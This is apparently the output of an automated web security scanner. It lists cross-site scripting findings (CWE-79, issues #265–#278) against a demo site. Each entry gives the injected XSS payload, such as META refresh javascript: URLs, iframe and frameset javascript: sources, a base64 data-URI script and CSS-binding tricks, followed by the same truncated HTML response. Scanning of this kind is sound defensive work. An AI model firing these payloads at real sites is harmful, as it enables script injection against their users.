href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #265\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"Link\" Content=\"<http://soapui.org/\nxss.css>; REL=stylesheet\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #266\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>BODY{-moz-binding:url(\"http://soapui.org/\nxssmoz.xml#xss\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #267\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <XSS STYLE=\"behavior: url(xss.htc);\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #268\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</\nSTYLE><UL><LI>XSS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #269\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC='vbscript:msgbox(\"XSS\")'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #270\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"mocha:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #271\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"livescript:[code]\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #272Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \u00ef\u00bf\u00bdscript\u00ef\u00bf\u00bdalert(\u00ef\u00bf\u00bdXSS\u00ef\u00bf\u00bd)\u00ef\u00bf\u00bd/script\u00ef\u00bf\u00bd\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #273\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript\n:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #274\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;\nbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #275\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;\nURL=javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #276\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #277\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></\nFRAMESET>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #278\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# <TABLE BACKGROUND=\"javascript:alert('XSS')\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 